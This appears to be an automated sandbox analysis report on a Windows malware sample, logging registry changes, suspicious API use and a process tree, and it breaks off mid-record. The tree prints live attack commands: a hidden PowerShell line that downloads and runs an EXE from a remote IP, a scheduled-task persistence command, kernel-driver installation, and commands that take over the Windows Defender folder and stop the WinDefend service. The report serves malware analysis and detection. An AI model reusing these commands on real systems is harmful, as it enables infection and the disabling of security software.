Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	QL4t9UZ.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d0030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	QL4t9UZ.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa20f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	QL4t9UZ.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000040000000100000010000000497904b0eb8719ac47b0bc11519b74d0030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d578112861900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	QL4t9UZ.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	QL4t9UZ.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
4636	schtasks.exe
3796	schtasks.exe
3412	schtasks.exe

Suspicious behavior: EnumeratesProcesses 46 IoCs

pid	Process
1892	powershell.exe
1892	powershell.exe
924	TempII4S27SZXSQRE4ZW0GRIEYVVTVDGGGK4.EXE
924	TempII4S27SZXSQRE4ZW0GRIEYVVTVDGGGK4.EXE
756	rapes.exe
756	rapes.exe
2580	cUpXaxB.exe
2580	cUpXaxB.exe
1220	powershell.exe
1220	powershell.exe
1220	powershell.exe
4920	rapes.exe
4920	rapes.exe
3788	TempQSYMROVXIDJNXYYOAL33DJHYUDXWM7HQ.EXE
3788	TempQSYMROVXIDJNXYYOAL33DJHYUDXWM7HQ.EXE
4828	powershell.exe
4828	powershell.exe
4828	powershell.exe
2204	powershell.exe
2204	powershell.exe
2204	powershell.exe
2976	powershell.exe
2976	powershell.exe
2976	powershell.exe
3460	powershell.exe
3460	powershell.exe
3460	powershell.exe
3832	483d2fa8a0d53818306efeb32d3.exe
3832	483d2fa8a0d53818306efeb32d3.exe
2544	5d0ced5341.exe
2544	5d0ced5341.exe
2544	5d0ced5341.exe
2544	5d0ced5341.exe
2544	5d0ced5341.exe
2544	5d0ced5341.exe
4708	e30a4e2837.exe
4708	e30a4e2837.exe
3288	de9077fc34.exe
3288	de9077fc34.exe
4732	ef54ab4fd5.exe
4732	ef54ab4fd5.exe
4732	ef54ab4fd5.exe
4732	ef54ab4fd5.exe
4732	ef54ab4fd5.exe
3288	de9077fc34.exe
3288	de9077fc34.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
660	Process not Found
660	Process not Found

Suspicious use of AdjustPrivilegeToken 21 IoCs

description	pid	Process
Token: SeDebugPrivilege	1892	powershell.exe
Token: SeDebugPrivilege	1220	powershell.exe
Token: SeDebugPrivilege	4828	powershell.exe
Token: SeDebugPrivilege	2204	powershell.exe
Token: SeDebugPrivilege	2976	powershell.exe
Token: SeDebugPrivilege	3460	powershell.exe
Token: SeDebugPrivilege	1900	tasklist.exe
Token: SeDebugPrivilege	1376	tasklist.exe
Token: SeLockMemoryPrivilege	3304	winhost.exe
Token: SeLockMemoryPrivilege	3304	winhost.exe
Token: SeDebugPrivilege	3168	tasklist.exe
Token: SeDebugPrivilege	4848	taskkill.exe
Token: SeLockMemoryPrivilege	5076	winhost.exe
Token: SeLockMemoryPrivilege	5076	winhost.exe
Token: SeDebugPrivilege	3680	taskkill.exe
Token: SeDebugPrivilege	1392	tasklist.exe
Token: SeDebugPrivilege	372	taskkill.exe
Token: SeDebugPrivilege	3692	taskkill.exe
Token: SeDebugPrivilege	1372	taskkill.exe
Token: SeDebugPrivilege	2552	taskkill.exe
Token: SeDebugPrivilege	4732	ef54ab4fd5.exe

Suspicious use of FindShellTrayWindow 46 IoCs

pid	Process
1332	86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe
1332	86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe
1332	86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe
924	TempII4S27SZXSQRE4ZW0GRIEYVVTVDGGGK4.EXE
2724	84c9895e7a.exe
2724	84c9895e7a.exe
2724	84c9895e7a.exe
3304	winhost.exe
5076	winhost.exe
3288	de9077fc34.exe
3288	de9077fc34.exe
3288	de9077fc34.exe
3288	de9077fc34.exe
3288	de9077fc34.exe
3288	de9077fc34.exe
3288	de9077fc34.exe
3288	de9077fc34.exe
3288	de9077fc34.exe
3288	de9077fc34.exe
3288	de9077fc34.exe
3288	de9077fc34.exe
3288	de9077fc34.exe
3288	de9077fc34.exe
3288	de9077fc34.exe
3288	de9077fc34.exe
1624	firefox.exe
3288	de9077fc34.exe
1624	firefox.exe
1624	firefox.exe
1624	firefox.exe
1624	firefox.exe
1624	firefox.exe
1624	firefox.exe
1624	firefox.exe
1624	firefox.exe
1624	firefox.exe
1624	firefox.exe
1624	firefox.exe
1624	firefox.exe
1624	firefox.exe
1624	firefox.exe
1624	firefox.exe
1624	firefox.exe
3288	de9077fc34.exe
3288	de9077fc34.exe
1624	firefox.exe

Suspicious use of SendNotifyMessage 37 IoCs

pid	Process
1332	86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe
1332	86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe
1332	86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe
2724	84c9895e7a.exe
2724	84c9895e7a.exe
2724	84c9895e7a.exe
3288	de9077fc34.exe
3288	de9077fc34.exe
3288	de9077fc34.exe
3288	de9077fc34.exe
3288	de9077fc34.exe
3288	de9077fc34.exe
3288	de9077fc34.exe
3288	de9077fc34.exe
3288	de9077fc34.exe
3288	de9077fc34.exe
3288	de9077fc34.exe
3288	de9077fc34.exe
3288	de9077fc34.exe
3288	de9077fc34.exe
3288	de9077fc34.exe
3288	de9077fc34.exe
3288	de9077fc34.exe
1624	firefox.exe
1624	firefox.exe
1624	firefox.exe
1624	firefox.exe
1624	firefox.exe
1624	firefox.exe
1624	firefox.exe
1624	firefox.exe
1624	firefox.exe
1624	firefox.exe
1624	firefox.exe
1624	firefox.exe
3288	de9077fc34.exe
3288	de9077fc34.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1624	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1332 wrote to memory of 4544	1332	86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe	88
PID 1332 wrote to memory of 4544	1332	86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe	88
PID 1332 wrote to memory of 4544	1332	86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe	88
PID 1332 wrote to memory of 2044	1332	86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe	89
PID 1332 wrote to memory of 2044	1332	86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe	89
PID 1332 wrote to memory of 2044	1332	86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe	89
PID 4544 wrote to memory of 4636	4544	cmd.exe	91
PID 4544 wrote to memory of 4636	4544	cmd.exe	91
PID 4544 wrote to memory of 4636	4544	cmd.exe	91
PID 2044 wrote to memory of 1892	2044	mshta.exe	93
PID 2044 wrote to memory of 1892	2044	mshta.exe	93
PID 2044 wrote to memory of 1892	2044	mshta.exe	93
PID 1892 wrote to memory of 924	1892	powershell.exe	101
PID 1892 wrote to memory of 924	1892	powershell.exe	101
PID 1892 wrote to memory of 924	1892	powershell.exe	101
PID 924 wrote to memory of 756	924	TempII4S27SZXSQRE4ZW0GRIEYVVTVDGGGK4.EXE	102
PID 924 wrote to memory of 756	924	TempII4S27SZXSQRE4ZW0GRIEYVVTVDGGGK4.EXE	102
PID 924 wrote to memory of 756	924	TempII4S27SZXSQRE4ZW0GRIEYVVTVDGGGK4.EXE	102
PID 756 wrote to memory of 2580	756	rapes.exe	106
PID 756 wrote to memory of 2580	756	rapes.exe	106
PID 756 wrote to memory of 2580	756	rapes.exe	106
PID 756 wrote to memory of 1840	756	rapes.exe	107
PID 756 wrote to memory of 1840	756	rapes.exe	107
PID 756 wrote to memory of 1840	756	rapes.exe	107
PID 1840 wrote to memory of 4828	1840	apple.exe	108
PID 1840 wrote to memory of 4828	1840	apple.exe	108
PID 1840 wrote to memory of 4828	1840	apple.exe	108
PID 4828 wrote to memory of 4624	4828	11.exe	110
PID 4828 wrote to memory of 4624	4828	11.exe	110
PID 4624 wrote to memory of 4844	4624	cmd.exe	112
PID 4624 wrote to memory of 4844	4624	cmd.exe	112
PID 4624 wrote to memory of 4844	4624	cmd.exe	112
PID 4844 wrote to memory of 4848	4844	11.exe	113
PID 4844 wrote to memory of 4848	4844	11.exe	113
PID 4848 wrote to memory of 4796	4848	cmd.exe	115
PID 4848 wrote to memory of 4796	4848	cmd.exe	115
PID 4848 wrote to memory of 4108	4848	cmd.exe	116
PID 4848 wrote to memory of 4108	4848	cmd.exe	116
PID 4848 wrote to memory of 4632	4848	cmd.exe	117
PID 4848 wrote to memory of 4632	4848	cmd.exe	117
PID 4848 wrote to memory of 2144	4848	cmd.exe	118
PID 4848 wrote to memory of 2144	4848	cmd.exe	118
PID 4848 wrote to memory of 1404	4848	cmd.exe	119
PID 4848 wrote to memory of 1404	4848	cmd.exe	119
PID 4848 wrote to memory of 2132	4848	cmd.exe	120
PID 4848 wrote to memory of 2132	4848	cmd.exe	120
PID 4848 wrote to memory of 3232	4848	cmd.exe	121
PID 4848 wrote to memory of 3232	4848	cmd.exe	121
PID 4848 wrote to memory of 2868	4848	cmd.exe	122
PID 4848 wrote to memory of 2868	4848	cmd.exe	122
PID 4848 wrote to memory of 936	4848	cmd.exe	123
PID 4848 wrote to memory of 936	4848	cmd.exe	123
PID 4848 wrote to memory of 3400	4848	cmd.exe	124
PID 4848 wrote to memory of 3400	4848	cmd.exe	124
PID 4848 wrote to memory of 1500	4848	cmd.exe	125
PID 4848 wrote to memory of 1500	4848	cmd.exe	125
PID 4848 wrote to memory of 2944	4848	cmd.exe	126
PID 4848 wrote to memory of 2944	4848	cmd.exe	126
PID 4848 wrote to memory of 1132	4848	cmd.exe	127
PID 4848 wrote to memory of 1132	4848	cmd.exe	127
PID 4848 wrote to memory of 1848	4848	cmd.exe	128
PID 4848 wrote to memory of 1848	4848	cmd.exe	128
PID 4848 wrote to memory of 4080	4848	cmd.exe	129
PID 4848 wrote to memory of 4080	4848	cmd.exe	129

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe
"C:\Users\Admin\AppData\Local\Temp\86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1332
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /create /tn DDYYQmaYOEC /tr "mshta C:\Users\Admin\AppData\Local\Temp\jAUKazy4s.hta" /sc minute /mo 25 /ru "Admin" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4544
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn DDYYQmaYOEC /tr "mshta C:\Users\Admin\AppData\Local\Temp\jAUKazy4s.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:4636
- C:\Windows\SysWOW64\mshta.exe
  mshta C:\Users\Admin\AppData\Local\Temp\jAUKazy4s.hta
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2044
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'II4S27SZXSQRE4ZW0GRIEYVVTVDGGGK4.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1892
  - - C:\Users\Admin\AppData\Local\TempII4S27SZXSQRE4ZW0GRIEYVVTVDGGGK4.EXE
      "C:\Users\Admin\AppData\Local\TempII4S27SZXSQRE4ZW0GRIEYVVTVDGGGK4.EXE"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:924
    - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Adds Run key to start application
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:756
      - C:\Users\Admin\AppData\Local\Temp\10313630101\cUpXaxB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10313630101\cUpXaxB.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2580
      - C:\Users\Admin\AppData\Local\Temp\10314650101\apple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10314650101\apple.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1840
        
        C:\Users\Admin\AppData\Local\Temp\11.exe
        
        "C:\Users\Admin\AppData\Local\Temp\11.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4828
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\14FA.tmp\14FB.tmp\14FC.bat C:\Users\Admin\AppData\Local\Temp\11.exe"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:4624
        
        C:\Users\Admin\AppData\Local\Temp\11.exe
        
        "C:\Users\Admin\AppData\Local\Temp\11.exe" go
        9⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4844
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\16BF.tmp\16C0.tmp\16C1.bat C:\Users\Admin\AppData\Local\Temp\11.exe go"
        10⤵
        Drops file in Program Files directory
        Suspicious use of WriteProcessMemory
        
        PID:4848
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        11⤵
        Launches sc.exe
        
        PID:4796
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:4108
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        Delays execution with timeout.exe
        
        PID:4632
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:2144
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:1404
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2132
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3232
        
        C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:2868
        
        C:\Windows\system32\sc.exe
        
